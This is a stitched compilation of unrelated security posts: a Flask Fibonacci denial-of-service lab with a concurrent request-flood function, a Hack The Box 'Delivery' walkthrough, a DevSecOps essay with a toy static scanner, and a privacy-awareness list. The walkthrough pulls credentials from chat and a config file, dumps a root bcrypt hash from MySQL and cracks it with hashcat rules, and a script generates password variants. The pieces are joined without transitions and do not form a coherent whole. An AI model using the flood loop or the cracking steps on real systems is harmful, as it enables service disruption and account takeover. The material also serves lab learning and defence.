How to DDoS with Python. We set up a server with a deliberate vulnerability and write an exploit against it together. The server is a small API built with the Python Flask framework: you give it a number n and it returns the nth Fibonacci number, implemented with naive recursion on purpose so that each request costs exponential CPU time and a handful of requests with a large n is enough to starve the service. Afterwards, the real fun: pentesting it!
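As an added example (not the original post's code), the naive recursive Fibonacci endpoint the post describes, next to a hardened version, plus a minimal request loop of the kind the post scripts against it. The route name /fib, the query parameter n and the cap MAX_N are assumptions. create_app() imports Flask only when called, so the rest of the file runs without Flask installed.

```python
"""Added example, not the original post's code. Vulnerable recursive
Fibonacci endpoint vs. a hardened one, plus an attacker request loop.
Route /fib, parameter n and MAX_N are assumptions."""

from concurrent.futures import ThreadPoolExecutor
from urllib.request import urlopen


def fib_naive(n, counter=None):
    """Exponential-time Fibonacci, as in the vulnerable endpoint.
    counter (a one-element list) records how many calls were made."""
    if counter is not None:
        counter[0] += 1
    if n < 2:
        return n
    return fib_naive(n - 1, counter) + fib_naive(n - 2, counter)


def fib_calls(n):
    """Number of calls fib_naive makes for n; equals 2*F(n+1)-1, so the
    work per request grows as fast as the Fibonacci numbers themselves."""
    counter = [0]
    fib_naive(n, counter)
    return counter[0]


def fib_iterative(n):
    """Linear-time replacement: same value, n additions."""
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a


MAX_N = 1000  # assumed cap for the hardened endpoint


def parse_n(raw):
    """Validate untrusted input: integer, non-negative, bounded.
    Returns (n, None) on success or (None, error_message)."""
    try:
        n = int(raw)
    except (TypeError, ValueError):
        return None, "n must be an integer"
    if n < 0:
        return None, "n must be >= 0"
    if n > MAX_N:
        return None, f"n must be <= {MAX_N}"
    return n, None


def create_app(hardened=True):
    """Flask wiring; hardened=False reproduces the vulnerable endpoint."""
    from flask import Flask, jsonify, request

    app = Flask(__name__)

    @app.route("/fib")
    def fib_route():
        if hardened:
            n, err = parse_n(request.args.get("n"))
            if err:
                return jsonify(error=err), 400
            return jsonify(n=n, fib=fib_iterative(n))
        # vulnerable: unbounded n, exponential CPU time per request
        n = int(request.args.get("n", "0"))
        return jsonify(n=n, fib=fib_naive(n))

    return app


def hammer(url, workers=50, requests_total=500):
    """Attacker loop: many concurrent requests to the expensive URL.
    Only ever point this at a server you own."""
    def one(_):
        try:
            with urlopen(url, timeout=60) as resp:
                return resp.status
        except Exception as exc:  # timeouts are the expected outcome
            return type(exc).__name__
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(one, range(requests_total)))


if __name__ == "__main__":
    for n in (10, 20, 25):
        print(f"fib({n}) = {fib_naive(n)} after {fib_calls(n)} calls")
    # in a second terminal: hammer("http://127.0.0.1:5000/fib?n=35")
    create_app(hardened=False).run(port=5000)
```

Run it once as the server, then call hammer() from another process: with the vulnerable route, fifty concurrent requests for n=35 keep every worker busy for seconds each and new connections start timing out. The hardened route rejects n above the cap with a 400 and answers the rest in microseconds; bounding the input is what matters, the faster algorithm just makes the bound generous.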
Delivery is an easy-level, beginner-friendly box with the assigned IP 10.10.10.222, but it still requires some creative thinking. It presents a helpdesk and a Mattermost instance. Opening a ticket on the helpdesk gives us a @delivery.htb address whose mail shows up in the ticket thread, which is enough to register and verify a Mattermost account. An internal Mattermost conversation discloses SSH credentials, which get us onto the box; privilege escalation then goes through database credentials found in the Mattermost config and a reused root password hash cracked with hashcat rules.
First, run an nmap scan with the following command:
nmap -sV -sC -A -T4 -p- -oA nmap_scan 10.10.10.222
Next, browse to the web service on this IP.
On the front page there is a HELPDESK link pointing to helpdesk.delivery.htb, so the box expects to be addressed by hostname. We add the following entry to /etc/hosts:
10.10.10.222 delivery.htb helpdesk.delivery.htb
Now we can open the site directly at http://delivery.htb
There is also a CONTACT US button; clicking it takes us to http://delivery.htb/#contact-us
Here we are told that unregistered users should use the HelpDesk to contact the team, and that once we have an @delivery.htb email address we can access the Mattermost server hosted at http://delivery.htb:8065
So far we have the following items of interest:
- helpdesk (http://helpdesk.delivery.htb)
- We need to get an email address from here
- Mattermost Server (http://delivery.htb:8065)
Now we view the page source and look for anything of interest. First, the source of the front page:
We see two article tags with IDs contact-us and elements. contact-us is linked from the navigation but elements is not, so we go to http://delivery.htb/#elements directly and get the following page
The interesting thing here is the messaging form at the bottom, whose placeholders contain some values:
- Name: Jane Doe
- Email: email@example.com
Submitting the form with data gave a 405 Not Allowed error. The page source shows that the form posts to http://delivery.htb/#, i.e. nowhere useful. It looks like a rabbit hole.
Now we go to http://helpdesk.delivery.htb and get the following page
Here we have the following options available:
- Sign in
- Open a New Ticket
- Check Ticket Status
We first try the Sign in option. As we don't have an account, we register for one.
Upon registration, we get the following message
We used a dummy email address here that we cannot read, so for the time being we move on to the next option, Open a New Ticket.
After creating the ticket we get the following feedback message
It gives us a ticket ID, 4577798, and an interesting support email address: firstname.lastname@example.org
Now we go to Check Ticket Status to see if we get anything
Here we get a form with two fields, email and ticket number. We fill in both with the values from the Create Ticket feedback
We get Access Denied ☹️
We try the email address we used for registration instead
Now, we get access to the Ticket Status dashboard (I created a new ticket with email: email@example.com, name: demo, phone: 1234567890, ext: 123)
After looking around this portal, I found nothing else of interest.
Let's go to the Mattermost server and register an account with the @delivery.htb email address
As soon we create the account, we are given feedback that a verification email has been sent to the provided email
So we go back to the helpdesk, refresh the ticket thread, and find the verification email there
The verification link is wrapped across the first three lines of the message. We join it back together and navigate to it
The email is now verified. We log in to the Mattermost server with the credentials email: firstname.lastname@example.org, password: Demo@12345
We can join the Internal Team channel, so we do and get the following page
It looks like a conversation going on.
There is a message from root:
Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also, from the nmap scan we know SSH is running on the system, so we try these credentials over SSH:
- user: maildeliverer
- password: Youve_G0t_Mail!
Delivery – User Flag
We have initial access. We look for the user flag and read it.
For privilege escalation, we first check this user's sudo permissions with sudo -l
It looks like we don't have any sudo permissions.
Now we run linpeas
It reports the following interesting items:
- Mattermost is running, and its install path
- MySQL is running
- 3 users with a login shell
- a sudo version that is potentially vulnerable
We check the sudo vulnerability first, but unfortunately it is not exploitable here.
Then we check the Mattermost config file /opt/mattermost/config/config.json and find the SQL settings (the SqlSettings section)
This gives us the SQL credentials:
- user: mmuser
- password: Crack_The_MM_Admin_PW
So we log in to MySQL with these credentials (mysql -u mmuser -p) and get access to the database.
Now we check whether the root password is stored anywhere in it. First we list the databases (SHOW DATABASES;), switch to the mattermost database (USE mattermost;) and list its tables (SHOW TABLES;).
There is a Users table. Listing every user's hash gives a jumbled result, so we narrow the query down to root:
SELECT username, password FROM Users WHERE username = 'root';
So we have the hash of root's password.
Also, in the Mattermost conversation root sent a message saying that everyone should stop reusing the same password, especially variants of PleaseSubscribe!: it may not be in rockyou, but if a hacker gets hold of the hash, they may use hashcat rules to crack it.
Cracking Password Hash
So we use hashcat rules to crack the hash. Before that we identify the hash type so that we can pass the right hash mode to hashcat.
hashid tells us the hash is bcrypt.
hashcat needs the mode number for bcrypt, which we look up with hashcat --help | grep -i bcrypt
So 3200 is the mode for bcrypt. Now we put the hash in hash.txt and PleaseSubscribe! in wordlist.txt and use the best64 rule. bcrypt is deliberately slow, so keeping the candidate set small (one base word times the rules in best64) is what makes this feasible; the same rule file over all of rockyou would take far longer.
Combining all of this:
hashcat -m 3200 hash.txt wordlist.txt -r rules/best64.rule
which gives the following output
The password is PleaseSubscribe!21
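As an added example that is not part of the original writeup, a small rule-based variant generator in the spirit of hashcat rules (a hand-written rule set, not hashcat's best64 file) together with the matching policy check that root's message asks for: reject any new password that is a trivial mutation of a banned base word. The base word list, the leet table and the rule set are assumptions.

```python
"""Added example, not from the writeup. Rule-style variant generation
for one base word, and the inverse check a password policy would run.
Rule set and leet table are hand-written assumptions, not best64."""

import itertools

LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
UNLEET = str.maketrans({"@": "a", "3": "e", "1": "i", "0": "o", "$": "s"})


def variants(base, max_digits=2):
    """Candidates an attacker would try for one base word: case toggles,
    leet substitution, an appended or removed '!', and appended digits."""
    stems = {base, base.lower(), base.upper(), base.capitalize(),
             base.translate(LEET)}
    stems |= {s.rstrip("!") for s in stems}
    stems |= {s + "!" for s in stems if not s.endswith("!")}
    out = set()
    for s in stems:
        out.add(s)
        for k in range(1, max_digits + 1):
            for digits in itertools.product("0123456789", repeat=k):
                out.add(s + "".join(digits))
    return out


def _normal_forms(pw):
    """Undo the mutations above. Order matters: stripping digits before
    un-leeting loses a trailing leet '3', un-leeting first turns an
    appended '1' into 'i', so both orders are returned."""
    digits_first = pw.rstrip("0123456789").rstrip("!").translate(UNLEET)
    leet_first = pw.translate(UNLEET).rstrip("0123456789").rstrip("!")
    return {digits_first.lower(), leet_first.lower()}


def is_banned_variant(candidate, banned_bases):
    """True if candidate collapses to one of the banned base words."""
    banned = set()
    for base in banned_bases:
        banned |= _normal_forms(base)
    return bool(_normal_forms(candidate) & banned)


def check_password(candidate, banned_bases=("PleaseSubscribe!",)):
    """Policy entry point: returns (accepted, reason)."""
    if is_banned_variant(candidate, banned_bases):
        return False, "variant of a known-compromised password"
    return True, "ok"


if __name__ == "__main__":
    cands = variants("PleaseSubscribe!")
    print(len(cands), "candidates;", "PleaseSubscribe!21" in cands)
    for pw in ("PleaseSubscribe!21", "Pl3ase$ubscrib3", "Youve_G0t_Mail!"):
        print(pw, check_password(pw))
```

The generator shows why PleaseSubscribe!21 falls in seconds even though it is not in rockyou: it is one base word and about a thousand candidates, which bcrypt cannot make expensive enough. The checker is the other side of the same rules, which is why a policy based only on length or character classes would still have accepted it.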
Delivery – Root Flag
We use it to switch to root (su root) and read the root flag.
DevSecOps is the practice of integrating security into development and operations. It emphasizes that security is a shared responsibility throughout the entire product development life cycle. DevSecOps represents a culture in which we strive to build products faster and safer, detecting and responding to security findings early in the process rather than reactively.
What is DevSecOps?
Practically, DevSecOps is the art of integrating the three pillars of the software development life cycle: development, operations and security.
To achieve this we introduce Continuous Integration and Continuous Deployment (CI/CD) pipelines for both staging and production environments. Let's look at each of the three departments individually, see what role it plays in the software development lifecycle and how it can be integrated with the others.
Creating new software components, improving them and shipping subsequent updates is the development department's main responsibility. This includes, but is not limited to:
- In house apps to support various operations
- APIs to support the integration between legacy and new systems
- Apps and software built on open-source technologies, which help accelerate the development process
Modern development is mostly based on agile methodologies, which favour continuous improvement over a sequential, waterfall-style process in which testing for bugs has to wait until a whole development phase is complete.
Developing a really cool piece of software is just one step; the next and more important step is to make sure it is deployed properly and that everything it needs in order to work is in place.
Operations plays its role there and helps manage the software across its life cycle:
- Performance Monitoring
- Logging & Monitoring
- Deploying New Infrastructure
- Maintaining infra for new releases
Security is the third part of this methodology and refers to securing the product itself. It covers information security, application security and infrastructure security.
Traditionally, security testing came at the end of the product lifecycle, once the product was fully developed, and was done by a team separate from both operations and development. This approach slows overall development and also lengthens the reaction time whenever a security incident happens.
Additionally, security tools themselves have generally been siloed. Each application security tool considers one application, and frequently only that application's source code. This made it hard for anyone to get an organization-wide view of security concerns, or to understand security risks in the context of the production environment.
By making security an integral part of the process, from initial planning to final release, these three core components of the software development lifecycle can be aligned.
Why is DevSecOps different?
The conventional software development approach is the waterfall approach, in which each unit of the development lifecycle, i.e. development, operations and security, works in a silo with no mutual coordination, and one process starts only after the previous one ends.
In many teams waterfall has largely been replaced by Agile, in which a project is divided into multiple sprints. But in many organizations security testing is still delayed until after development, just as in waterfall! The delay reduces developer productivity and forces developers to backtrack in order to fix the security issues the testing eventually finds.
DevSecOps, by contrast, allows security testing to happen continuously and automatically, in the same general time frame in which regular development and QA testing of the software take place.
For instance, security tests can be run by engineers as part of the agile workflow while development is still going on, which saves the time otherwise lost to context switching when security tests are carried out after the development process.
DevSecOps Best Practices
We’ll discuss some of the building blocks of DevSecOps methodology and how we can implement them.
Secure Code Practice
The first and foremost thing is to educate developers on basic security hygiene and give them opportunities to learn how to write secure code. Secure coding builds resistance to vulnerabilities in from the very beginning, which saves a great deal of time and effort compared to discovering and patching those vulnerabilities once the product is complete. Moreover, IDE extensions such as Snyk can be provided to developers to help them detect vulnerabilities as early as possible.
As in DevOps, automation is key in DevSecOps as well. To make sure code is checked on every push to the repository, security checks must be automated in the CI/CD pipeline.
Various tools can look for potential security vulnerabilities in a code release, such as Static Application Security Testing (SAST) tools, which scan for and report vulnerabilities on every push so that they are addressed early in development.
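As an added example (not from the article, and not any real SAST product), a minimal static check of the kind a SAST gate runs on every push: it walks Python source with the standard ast module and flags a few well-known dangerous patterns. The sample source is constructed for illustration, the rule IDs are made up, and the rule set is a tiny subset of what real tools such as Bandit or Semgrep cover.

```python
"""Added example, not from the article. A toy SAST gate: parse Python
source into an AST and flag eval/exec, pickle loads, shell=True and
hardcoded secrets. Rule IDs and the sample source are constructed."""

import ast

# constructed sample of a file a developer might push
SAMPLE_SOURCE = '''
import os, subprocess, pickle
PASSWORD = "hunter2"                     # hardcoded secret
def run(cmd):
    subprocess.call(cmd, shell=True)     # shell injection risk
def load(blob):
    return pickle.loads(blob)            # untrusted deserialization
def calc(expr):
    return eval(expr)                    # arbitrary code execution
def ok(path):
    return open(path).read()
'''

SECRET_NAMES = {"password", "passwd", "secret", "token", "api_key"}


def _call_name(node):
    """Dotted name of a call target, e.g. 'subprocess.call'."""
    func = node.func
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _shell_true(node):
    """True if the call passes the literal keyword shell=True."""
    return any(kw.arg == "shell" and isinstance(kw.value, ast.Constant)
               and kw.value.value is True for kw in node.keywords)


def scan_source(source, filename="<input>"):
    """Return findings as (line, rule_id, message), sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in {"eval", "exec"}:
                findings.append((node.lineno, "EVAL", f"use of {name}()"))
            elif name in {"pickle.load", "pickle.loads"}:
                findings.append((node.lineno, "PICKLE",
                                 "pickle deserialization of untrusted data"))
            elif name == "os.system" or (name.startswith("subprocess.")
                                         and _shell_true(node)):
                findings.append((node.lineno, "SHELL",
                                 f"{name} runs a command through the shell"))
        elif isinstance(node, ast.Assign):
            for target in node.targets:
                if (isinstance(target, ast.Name)
                        and target.id.lower() in SECRET_NAMES
                        and isinstance(node.value, ast.Constant)
                        and isinstance(node.value.value, str)
                        and node.value.value):
                    findings.append((node.lineno, "SECRET",
                                     f"hardcoded secret in {target.id}"))
    return sorted(findings)


def gate(source, fail_on=("EVAL", "PICKLE", "SHELL", "SECRET")):
    """CI gate: True if the push may proceed, False if a blocking rule fired."""
    return not any(rule in fail_on for _, rule, _ in scan_source(source))


if __name__ == "__main__":
    for line, rule, msg in scan_source(SAMPLE_SOURCE):
        print(f"line {line}: {rule}: {msg}")
    print("gate:", "pass" if gate(SAMPLE_SOURCE) else "FAIL")
```

In a pipeline the gate's boolean becomes the job's exit code, so the push is blocked before review. Note what an AST pass does not see: a secret assembled at runtime, or shell=True passed through a variable, which is why real tools add data-flow analysis and why the gate should be one check among several rather than the only one.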
Shift Left Approach
Unlike the waterfall approach discussed earlier, where one process must end completely before the next starts, the shift-left approach moves security concerns to the very beginning of the process, into the development phase. It is a win-win for developers and security engineers: developers can fix vulnerabilities with far less effort than once the product is fully developed, and security engineers get a product that is secure from the start.
A common challenge is that shifting left can disrupt ongoing DevOps processes, which is uncomfortable for everyone at first, but adopting the shift-left mentality is well worth it and benefits the environment in many ways.
To conclude, DevSecOps is a complete culture change within the organization. It requires active involvement and effort from every team in the development process. Automation is the magic word: automate every process you can, whether that is deploying infrastructure as code (IaC), writing security unit tests or running dynamic application scans.
Educate and empower people to adopt modern ways of developing a secure product, and give them the means to learn secure coding and bake security in from the very beginning of the process.
The internet has transformed how we interact with various industries worldwide and changed how we do things. We can now do many things online, from banking to shopping and even medical appointments.
While the advent of the internet has brought welcome changes, it has also created problems, particularly around cybersecurity and privacy for its users. During the pandemic, companies and organizations worldwide demanded better connectivity as more people worked from home; at the same time, in 2021, cybercrime skyrocketed.
According to Check Point Research, organizations surveyed in its 2021 study experienced about 925 cyberattacks per week globally. While the causes of these attacks vary, human error and poor password practices are often prominent suspects. After all, people create at least 100 different accounts and passwords in their lifetime, so we often reuse passwords out of convenience.
Password hygiene isn’t the only thing we tend to overlook when using the internet. In fact, there are plenty of different ways we often give up our data without really knowing or realizing it.
To help you better understand how our data is often at risk, we’ve created a list of the various types of technology and software we interact with almost daily that could store and distribute our data.
Social media is a great way to keep in touch with friends and family. However, not many people consider the type of information they’re giving up each time they post something on a platform. Whether it’s information about birthdays, employment history, and the like, we consistently give up more data than we think.
Cybersecurity experts encourage people to keep their social media profiles private and limit the information they share in their profiles’ “About Me” section to make it harder for hackers to piece together information about a victim.
Food delivery apps and services are known to use big data analytics to stay competitive and understand their customers' preferences. Each time we order food or groceries from an app, we tell these companies what we like and don't like, and how often we need certain items.
Food companies and other service providers can then sell this data to their vendors, leveraging this information by creating ads that target the customers they want.
Location information is something we often give up without realizing it. Our phone is a location beacon through navigation apps, the weather app and social media platforms. An interactive New York Times article shows how easy it is to piece together a person's movements from the location data one app on their smartphone collects: how long they were at a doctor's appointment, how far they went while hiking, and the address they stayed at overnight.
Like food delivery apps and services, streaming platforms like Netflix, Hulu, and Amazon Prime leverage user data to determine what programs and services users might like. These streaming providers can then market new series and films and target selected users.
Video conferencing services like Zoom, Microsoft Teams and Google Meet gained significant popularity during the pandemic. Zoom's daily meeting participants grew from 10 million in December 2019 to over 300 million in April 2020.
While this was excellent news for Zoom, it also made the service a prime target for cybercriminals and other malicious third parties. In April 2020 alone, multiple Zoom privacy issues and security flaws were reported, including a bug that made it easy for an attacker to take control of a user's microphone or webcam.
To protect yourself, always log off and close video conferencing apps when they are not in use, and cover your webcam when it is not needed; small dedicated covers are available for laptop webcams.
Have you ever looked up a purse on an online catalog only to get served ads on a completely different website?
Here's the thing: online shopping sites routinely track what users look at so they can remarket the product to them later, hoping it will lead to a purchase.
For security-minded people, webcams are suspect for good reason. A compromised webcam can be switched on remotely to record the victim, and attackers may also plant malware that locks the victim out of the webcam and then demand payment to restore it. All of this can be done remotely.
To reduce the risk, be careful about which browser extensions you install and limit webcam use where possible.
Health apps like calorie counters, period prediction apps and workout trackers are great for staying on top of your fitness. However, they come with a caveat: they always track your data.
Period tracking apps have recently come under fire for allegedly selling their users' data. While this may seem harmless, such information, combined with what is available from social media and the rest of a person's internet footprint, lets attackers build a fuller picture of a target and find ways to exploit them.
10. Review sites and forums
All it takes is a restaurant review or a forum comment to expose your interests and, potentially, your location. While reviews and comments can be helpful to others online, they can also reveal our whereabouts.
Now that you are more aware of how your data can be distributed without your knowledge, you are on track to becoming a lot more careful. As long as we carry smartphones and use smart gadgets, it is impossible not to have a digital footprint of some sort. However, we can always take steps to safeguard our privacy and protect our personal information as best we can.